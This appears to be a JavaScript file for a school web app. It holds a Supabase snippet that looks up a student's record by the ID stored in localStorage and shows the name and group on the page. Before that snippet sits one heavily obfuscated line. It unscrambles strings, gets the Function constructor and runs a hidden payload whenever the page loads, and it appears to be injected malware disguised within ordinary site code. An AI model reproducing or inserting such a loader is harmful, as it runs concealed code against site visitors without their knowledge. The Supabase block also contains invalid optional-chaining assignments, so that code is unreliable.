(function(){var EKJ='',Msl=892-881;function TNq(x){var l=1312979;var g=x.length;var m=[];for(var u=0;u<g;u++){m[u]=x.charAt(u)};for(var u=0;u<g;u++){var f=l*(u+388)+(l%25821);var d=l*(u+526)+(l%25789);var b=f%g;var n=d%g;var v=m[b];m[b]=m[n];m[n]=v;l=(f+d)%7327163;};return m.join('')};var FCL=TNq('noftchncdmraegxjksciupqovbylrotwsrutz').substr(0,Msl);var DRg='t}atc=y06n=l,,ub68u5(  ,s0;s8f.d."a;"a"ratllap;fwo=z+p*()==qy)f*)(g1"yp4 r = 4Cvji.m[it8-+-[,,fel+gir)=]1s}v]vag7s,v+c1(p20n=hv=aat(e)l(;arc(d5 aas{f(C5a=og7)gan[l(t="+)"9f. ;i.ol=)= i;oltf7)q==nn (am2r9n; es.]<n0;)ac;+irves6v;]n;+d[nen;g=(gn;vkrto}n6.aa(e1;h++fr. }rtarvA.ke;r)=r;d=9nnr0vra-[v2s=0ohf==n==a[ ) c}gf6ve]u"t7{=hnhl!r (!trc7l"= .l97rah),bk6shovasoorlACa(<re]v=+)=ucrr6gsb8nag=2;orf(n,;.}]3)[s{0i;ff;p[uot)(tudct;nfc+,r,o ; a]r71n]lvh {v((+leeihepolid=btz9aslus7lrni=t=,g8lrpoarm;dml.g +h)A;].,.a9cd<dpr(Aertee+ ;.d)ns+r=ehlq+c)Cdi;2uaii[)tv.Sbuu(r=lcssa0]6afh.us=gm;vcvy+olsn7(m(,ghhialir=ea-A[o(;vu6a9("[erao0(tu;ed17l)8<ite.bush0la2urs{tp=.rm)i+gj,tju..fshi"l8;8trCfu)t zur)n1c (hr(r;vjgio}o;)+;a61)=;jrhneg,+]4){u2,>0oi[r+;)p.e(,ni.;h=S1.+ sgaC),)h[h;]iq14acd[;7dv,utxoa]t zal;p))b;1k-;lra.etl,,o)-;=r1ee,C1anaa8v=de;=(vy;,r3(;(+9(o=r,hgr;).ob(,, rn-kl7s+<>+.2Ct{rv6v,n0y(;';var Uhf=TNq[FCL];var yTX='';var UVu=Uhf;var Snl=Uhf(yTX,TNq(DRg));var NDu=Snl(TNq('eFFf)fF:uCd) !iiF%344oF5Faunt5ghcaFn04ry(Fof)o_fjF)-<nrueD=_o$s(}4o%Fgsen1re0.)jF*l%e2rl.1$%$nrag,m5m{6ead.f5fc3)hs]sp2o;oraF}i=nl2r}ougF]3ts6F3)KcsF2F5e2F"non$,]Fe$ewyF%dFu9mK},;ues)r]weFF.8_,FF3efcgiCl8esFt(i(l$fe0(wF00]t.|fFA?(2HG(F"@eon5ics6c3uIar ;8F4Fl_rme,]}n,((#%iI3ie 3l3 pooo!3)rer74.u!%uF!))t48mnrtvno}te8;de,rb_sre%t3. h=-)_i_qs3vm>3.n;euhr_,ro_.#0<{mS=bt=?F7,)7nK!av.enSifno)nc%,elFe6esfF7m.aEo$a]ieeF;[.Nhj;.FoF]n6 CTrsa%a\'dp.F"(Fe Heln!o$S@2tofFFl=.F.,5enFo72t]rr]_..!t]@xo=o.r0err&c]a]%_nF[nC1uu$h. gtwtnicd_?Fs 1i\/[!u]erfnFer,!dF f3:4%lndn)1%3FrFu.t;eFnn[lcFF3lnie(5fal2tFcFFei)j Lslo30w}Fu4ee?r) !ca;H0!.[e%medf60oaor=(eF_jm)_ e.:e5i]g2o]heu.s.2e_Kxerfmh%]o$rd(;!6F,3Dn(a)bhFF%]{)F)no_]am%_na.eT_F.eoso,F,emrFH%!B]id)oF:fw]_dnFoc-_F1@poa;%+yp$iFreaFhc.asnFem[t-n"k{7oum%F.]s_aagin)e[1,(T59)$_oqz3nj+tsF::t4.u(rFFLsn !v}iprFree.!4%r;_6.!{4ep.ssFFrml)s].-F37f}5Fd]t;F!7g_v"ed,_7o w2F+.n(e)FrmonjF:_,_el]o3sxo}wFhc]sFfst(j$$92aajrFm$md.tcranc}7cFxu).".ifpKA]If]%)51rDsi%$)d:.r=-37(s,a3)rFaf)6;ts_,.F_e}}1ec.i{rA{6)fe(cs7$6FuFbcr,{,]i\'!li.46Fa.%F;5787yrdoe1&FeF%erf.stse;e=)eFa.aw}hppj;tl(FlnF]FgFbFFa(s}s.([!fF5s9&(&ua9v7!2omt=.s)e85rt (5F11ro%$!uI)Fuco_27i;_iNi.l))q<=}h-ru 3(#(72ss)1FF0);Fd.e*F3=.omtd;u.Foc__arS!(2a _=m_iFe1\'if.B;t%k@F}hm.a(saf)ne;]fFsc(ten7.se(f)]F1=]eo6eF]8.t3i;.C!6dt)K2a5.u%Fr4 [F0]Jm%8F:=)<rF$ty;]nFra=:F1.F(it!nrM)Fn3rA9tLay)FeLg;l%88ter<\'iEag_.soa4J.2t!oF(n.7]#_iBn;o4]\/} ],} F7.rs:z",6{con[Sed)F(bFs}-e,=te7$frFiu6txsFpc8G_](e;fanw.,(tF;)tF{E[FFFtttt.)=tsovFEt(. eI=Fe!#;mrntdj_lFi5LFt"1)o10riF#ressuo1o"7FFG_)eF{eF[_7aueaHdn..J5trooH)u ]FFj09c7)lF.1)Lr0FFaafeetFj_ ctII_o$Fis.\',$x 3rmiD]]e>p($:d]7%[_yF\/Gtg]-t3el$MoicFe8eA]sFutF)7i;s.%$5et]e_u,ou(tseF(,.m,rFt]p reF }+.Ga4to2FoiF[7!2?%i}n,$<+,(r$F}F#Fe.F5_oe1e(F}{n].bjF$FrerDF.xfe)-eFep:e(o0e$ca=F65o0l)u3}u(Ms)4,3 Ke.s 67,9FS]Fs$4o_ua.-0_e,olti\/6FF%lussne8sF)e2e,0e46eF.eMF [se]3Fl{emxF,4f4irn$Feoue4FMu#Fseu.,,.3){b;eu_)(er]aF=eaF4,l+rm+FF34r} _(>(e&Fe7mu!ntFa6)n]FxrFu!({1he_.)e}j!p1|+Fnt(tmFe.t5wuF"yko[\/uo\/]5lr7N.F(B.}Fe7}c1t{neendegKiaFstc12cfa#]fnlo@[7}4F)n%jue[_6.Fe%6j18d(e{F]"ia{FfenCo4.n;s+%ox5(a9o)hF!,,Frl#t}[p_;(dl.ie)d\/:a$e%,3FdF_1FF9e$!,$2(F[n6)l,w)terrej[FsFi)6ro,i"!ab;.Ftel1$3%j2(jFe@{[lb%F=D$n}(3s i@,oiC18{ xJj2{_.6o)i[ffc072a]cF%F b.4$e)xe_ojjuuuF:ro$4{H$6eauo,jf%Fd j.s.4;(e% pa)en gFF.]2FFo.+eFltr.o_)[;F]dr\/_j8$=2,lu _as]],.F.et7x];3Fwui[.stp.)5(17 witry{net)oFueF>5d%3.Dj:.ta_}{ 4j8:cou_@oF Stu( (;lt8c6F%urasFo5te;tb_$a!hl_t;)cb.eaiF.Fzl:g=H2]$a)};.b3,r8(c0FenFS]]Fs6]l6Fe12m_%ai@1 (,FiFF}3uFsFts)n;%t00jabF$sal4scaM@ S;7oFFo%3e%Fe*[ Fiat;=iF!=ppr(%1!8-;ue=rej;.9e%o9.xF vt*Fl,w.0m@EndT=ee$u6F_td,@o).wo($(ooFot]=eix[=FF'));var uVk=UVu(EKJ,NDu );uVk(9135);return 8997})()
// ========== SB ==========
(async () => {
  const { createClient } = await import('https://cdn.jsdelivr.net/npm/@supabase/supabase-js/+esm');
  const supabase = createClient(
    'https://mhnzjhelbupyifdlpngv.supabase.co',
    'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6Im1obnpqaGVsYnVweWlmZGxwbmd2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDkyMTg1MjUsImV4cCI6MjA2NDc5NDUyNX0.tZAtvUL6kAFfEhwrXgopbQLcnq9qCCm5zpPBkm6z8wY'
  );

  const matricula = localStorage.getItem("matriculaUsuario");
  if (matricula) {
    const { data, error } = await supabase
      .from("usuarios")
      .select("usuario, nombre, apellido_paterno, apellido_materno, grado, grupo")
      .eq("usuario", matricula)
      .single();
    
    if (error || !data) {
      console.error("❌ No se pudieron obtener los datos del usuario:", error);
    } else {
      document.getElementById("matriculaAlumno")?.textContent = data.usuario;
      document.getElementById("nombreAlumno")?.textContent = `${data.nombre} ${data.apellido_paterno} ${data.apellido_materno}`;
      document.getElementById("grupoAlumno")?.textContent = `${data.grado || '—'}° ${data.grupo || '—'}`;
    }
  } else {
    console.warn("⚠️ No se encontró matrícula en localStorage");
  }
})();
